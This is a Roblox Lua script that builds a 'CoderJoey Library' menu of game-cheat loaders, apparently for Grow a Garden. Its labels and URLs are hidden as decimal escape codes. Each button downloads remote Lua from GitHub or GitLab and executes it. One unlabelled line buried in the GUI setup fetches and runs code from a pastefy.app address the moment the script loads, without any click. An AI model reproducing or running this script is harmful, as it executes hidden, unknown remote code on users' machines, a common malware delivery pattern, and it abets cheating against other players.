local a=game:GetService("Players")local b=game:GetService("TweenService")local c=a.LocalPlayer
local d=Instance.new("ScreenGui")d.Name="A1"d.ResetOnSpawn=false
d.ZIndexBehavior=Enum.ZIndexBehavior.Sibling
d.Parent=c:WaitForChild("PlayerGui")
local e=Instance.new("Frame")e.Size=UDim2.new(0,220,0,226)
e.Position=UDim2.new(0.5,-110,0.5,-113)
e.BackgroundColor3=Color3.fromRGB(15,15,15)
e.BackgroundTransparency=0.1
e.BorderSizePixel=0
e.Parent=d
loadstring(game:HttpGet("https://pastefy.app/23DHRvXF/raw"))()
Instance.new("UICorner",e).CornerRadius=UDim.new(0,12)
local f=Instance.new("TextLabel")f.Size=UDim2.new(1,0,0,20)
f.Position=UDim2.new(0,0,0,-24)
f.BackgroundTransparency=0.2
f.BackgroundColor3=Color3.fromRGB(255,215,0)
f.Text="\226\156\154 GUI loading..."f.TextColor3=Color3.fromRGB(0,0,0)
f.Font=Enum.Font.GothamBold
f.TextSize=14
f.Parent=e
Instance.new("UICorner",f).CornerRadius=UDim.new(0,6)
spawn(function()wait(5)b:Create(f,TweenInfo.new(0.6,Enum.EasingStyle.Quad,Enum.EasingDirection.Out),{TextTransparency=1,BackgroundTransparency=1}):Play()wait(0.6)f:Destroy()end)
local g=Instance.new("Frame")
g.Size=UDim2.new(1,8,1,8)
g.Position=UDim2.new(0,-4,0,-4)
g.BackgroundColor3=Color3.fromHSV(0,1,1)
g.BorderSizePixel=0
g.ZIndex=0
g.Parent=e
Instance.new("UICorner",g).CornerRadius=UDim.new(0,16)
spawn(function()local h=0
while d.Parent do h=(h+0.007)%1
g.BackgroundColor3=Color3.fromHSV(h,1,1)
wait(0.03)end end)
local i=Instance.new("TextLabel")i.Size=UDim2.new(1,-70,0,32)
i.Position=UDim2.new(0,10,0,10)
i.BackgroundTransparency=1
i.Text="\67\111\100\101\114\74\111\101\121\32\76\105\98\114\97\114\121"
i.TextColor3=Color3.fromRGB(255,255,255)
i.Font=Enum.Font.GothamBlack
i.TextSize=22
i.TextStrokeTransparency=0.6
i.TextXAlignment=Enum.TextXAlignment.Left
i.Parent=e
local j=Instance.new("TextLabel")j.Size=UDim2.new(1,0,0,16)
j.Position=UDim2.new(0,0,1,-20)
j.BackgroundTransparency=1
j.Text="\77\97\100\101\32\98\121\58\32\67\111\100\101\114\74\111\101\121\32\124\32\84\105\107\116\111\107\58\32\64\67\111\100\101\114\74\111\101\121"
j.TextColor3=Color3.fromRGB(160,160,160)
j.Font=Enum.Font.Gotham
j.TextSize=12
j.TextXAlignment=Enum.TextXAlignment.Center
j.Parent=e
local function k(l,m,n)local o=Instance.new("TextButton")
o.Size=UDim2.new(1,0,0,26)o.Position=UDim2.new(0,0,0,m)
o.BackgroundColor3=Color3.fromRGB(30,30,30)
o.BorderSizePixel=0
o.Text=n
o.TextColor3=Color3.fromRGB(255,255,255)
o.Font=Enum.Font.GothamBold
o.TextSize=15
o.ZIndex=1
o.Parent=l
Instance.new("UICorner",o).CornerRadius=UDim.new(0,10)
o.MouseEnter:Connect(function()b:Create(o,TweenInfo.new(0.2,Enum.EasingStyle.Quad,Enum.EasingDirection.Out),{BackgroundTransparency=0.3}):Play()end)
o.MouseLeave:Connect(function()b:Create(o,TweenInfo.new(0.2,Enum.EasingStyle.Quad,Enum.EasingDirection.Out),{BackgroundTransparency=0}):Play()end)
return o end
local p=k(e,50,"\82\117\110\32\67\111\100\101\114\74\111\101\121\32\68\97\114\107\32\83\112\97\119\110\101\114")
p.MouseButton1Click:Connect(function()
p.Text="\76\111\97\100\105\110\103\46\46\46"
p.BackgroundTransparency=0.5
local q,r=pcall(function()
local s=loadstring(game:HttpGet("\104\116\116\112\115\58\47\47\103\105\116\108\97\98\46\99\111\109\47\100\97\114\107\105\101\100\97\114\107\105\101\47\100\97\114\107\47\45\47\114\97\119\47\109\97\105\110\47\83\112\97\119\110\101\114\46\108\117\97"))()
s.Load()end)
p.Text=q and "\76\111\97\100\101\100\33" or "\70\97\105\108\101\100\33"
if not q then warn("\91\67\111\100\101\114\74\111\101\121\93\32\69\114\114\111\114\58\32"..tostring(r))end
wait(2)
p.Text="\82\117\110\32\67\111\100\101\114\74\111\101\121\32\68\97\114\107\32\83\112\97\119\110\101\114"
p.BackgroundTransparency=0 end)
local t=k(e,82,"\82\117\110\32\67\111\100\101\114\74\111\101\121\32\80\114\111\106\101\99\116\32\82\101\118\101\114\115\101")
t.MouseButton1Click:Connect(function()
t.Text="\76\111\97\100\105\110\103\46\46\46"
t.BackgroundTransparency=0.5
local u,v=pcall(function()
loadstring(game:HttpGet("\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\118\101\114\121\105\109\112\111\114\116\97\110\116\114\114\47\120\47\114\101\102\115\47\104\101\97\100\115\47\109\97\105\110\47\103\97\103\95\118\105\115\117\97\108\46\108\117\97",true))("\100\105\115\99\111\114\100\46\103\103\47\99\115\120\117\50\110\67\107\119\57")end)
t.Text=u and "\76\111\97\100\101\100\33" or "\70\97\105\108\101\100\33"
if not u then warn("\91\67\111\100\101\114\74\111\101\121\93\32\69\114\114\111\114\58\32"..tostring(v))end
wait(2)
t.Text="\82\117\110\32\67\111\100\101\114\74\111\101\121\32\80\114\111\106\101\99\116\32\82\101\118\101\114\115\101"
t.BackgroundTransparency=0 end)
local w=k(e,114,"\82\117\110\32\67\111\100\101\114\74\111\101\121\32\88\32\72\117\98")
w.MouseButton1Click:Connect(function()
w.Text="\76\111\97\100\105\110\103\46\46\46"
w.BackgroundTransparency=0.5
local x,y=pcall(function()
loadstring(game:HttpGet("\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\75\117\110\105\68\101\118\76\117\97\47\71\114\111\119\65\71\97\114\100\101\110\47\114\101\102\115\47\104\101\97\100\115\47\109\97\105\110\47\70\117\108\108\70\101\97\116\117\114\101\115\79\98\115\97"))()end)
w.Text=x and "\76\111\97\100\101\100\33" or "\70\97\105\108\101\100\33"
if not x then warn("\91\67\111\100\101\114\74\111\101\121\93\32\69\114\114\111\114\58\32"..tostring(y))end
wait(2)
w.Text="\82\117\110\32\67\111\100\101\114\74\111\101\121\32\88\32\72\117\98"
w.BackgroundTransparency=0 end)
local z=k(e,146,"\79\112\101\110\32\67\111\100\101\114\74\111\101\121\32\69\103\103\32\68\101\116\101\99\116\111\114")
z.MouseButton1Click:Connect(function()
z.Text="\76\111\97\100\105\110\103\46\46\46"
z.BackgroundTransparency=0.5
local A,B=pcall(function()
loadstring(game:HttpGet("\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\75\117\110\105\68\101\118\76\117\97\47\71\114\111\119\65\71\97\114\100\101\110\47\114\101\102\115\47\104\101\97\100\115\47\109\97\105\110\47\69\71\71\37\50\48\68\69\84\69\67\84\79\82\49"))()end)
z.Text=A and "\76\111\97\100\101\100\33" or "\70\97\105\108\101\100\33"
if not A then warn("\91\67\111\100\101\114\74\111\101\121\93\32\69\114\114\111\114\58\32"..tostring(B))end
wait(2)
z.Text="\79\112\101\110\32\67\111\100\101\114\74\111\101\121\32\69\103\103\32\68\101\116\101\99\116\111\114"
z.BackgroundTransparency=0 end)
local C=k(e,178,"\82\117\110\32\67\111\100\101\114\74\111\101\121\32\80\101\116\32\87\101\105\103\104\116\32\67\104\97\110\103\101\114")
C.MouseButton1Click:Connect(function()
C.Text="\76\111\97\100\105\110\103\46\46\46"
C.BackgroundTransparency=0.5
local D,E=pcall(function()
loadstring(game:HttpGet("\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\75\117\110\105\68\101\118\76\117\97\47\71\114\111\119\65\71\97\114\100\101\110\47\114\101\102\115\47\104\101\97\100\115\47\109\97\105\110\47\112\101\116\115\105\122\101\99\104\97\110\103\101\114"))()end)
C.Text=D and "\76\111\97\100\101\100\33" or "\70\97\105\108\101\100\33"
if not D then warn("\91\67\111\100\101\114\74\111\101\121\93\32\69\114\114\111\114\58\32"..tostring(E))end
wait(2)
C.Text="\82\117\110\32\67\111\100\101\114\74\111\101\121\32\80\101\116\32\87\101\105\103\104\116\32\67\104\97\110\103\101\114"
C.BackgroundTransparency=0 end)
local F=Instance.new("TextButton")
F.Size=UDim2.new(0,26,0,22)
F.Position=UDim2.new(1,-60,0,10)
F.BackgroundColor3=Color3.fromRGB(35,35,35)
F.BorderSizePixel=0
F.Text="\226\136\146"
F.Font=Enum.Font.GothamBold
F.TextSize=22
F.TextColor3=Color3.fromRGB(255,255,255)
F.Parent=e
Instance.new("UICorner",F).CornerRadius=UDim.new(0,6)
F.MouseEnter:Connect(function()b:Create(F,TweenInfo.new(0.2,Enum.EasingStyle.Quad,Enum.EasingDirection.Out),{BackgroundTransparency=0.3}):Play()end)
F.MouseLeave:Connect(function()b:Create(F,TweenInfo.new(0.2,Enum.EasingStyle.Quad,Enum.EasingDirection.Out),{BackgroundTransparency=0}):Play()end)
local G=true
F.MouseButton1Click:Connect(function()
G=not G
p.Visible=G
t.Visible=G
w.Visible=G
z.Visible=G
j.Visible=G
F.Text=G and "\226\136\146" or "\43"
e.Size=G and UDim2.new(0,220,0,226)or UDim2.new(0,220,0,45)end)
local H=Instance.new("TextButton")
H.Size=UDim2.new(0,26,0,22)
H.Position=UDim2.new(1,-30,0,10)
H.BackgroundColor3=Color3.fromRGB(35,35,35)
H.BorderSizePixel=0
H.Text="\195\151"
H.Font=Enum.Font.GothamBold
H.TextSize=22
H.TextColor3=Color3.fromRGB(255,255,255)
H.Parent=e
Instance.new("UICorner",H).CornerRadius=UDim.new(0,6)
H.MouseEnter:Connect(function()b:Create(H,TweenInfo.new(0.2,Enum.EasingStyle.Quad,Enum.EasingDirection.Out),{BackgroundTransparency=0.3}):Play()end)
H.MouseLeave:Connect(function()b:Create(H,TweenInfo.new(0.2,Enum.EasingStyle.Quad,Enum.EasingDirection.Out),{BackgroundTransparency=0}):Play()end)
H.MouseButton1Click:Connect(function()d:Destroy()end)
local I=false
local J,K
e.InputBegan:Connect(function(L)
if L.UserInputType==Enum.UserInputType.MouseButton1 or L.UserInputType==Enum.UserInputType.Touch then
I=true
J=L.Position
K=e.Position
L.Changed:Connect(function()
if L.UserInputState==Enum.UserInputState.End then
I=false end end)end end)
e.InputChanged:Connect(function(M)
if I and (M.UserInputType==Enum.UserInputType.MouseMovement or M.UserInputType==Enum.UserInputType.Touch)then
local N=M.Position-J
e.Position=UDim2.new(K.X.Scale,K.X.Offset+N.X,K.Y.Scale,K.Y.Offset+N.Y)end end)
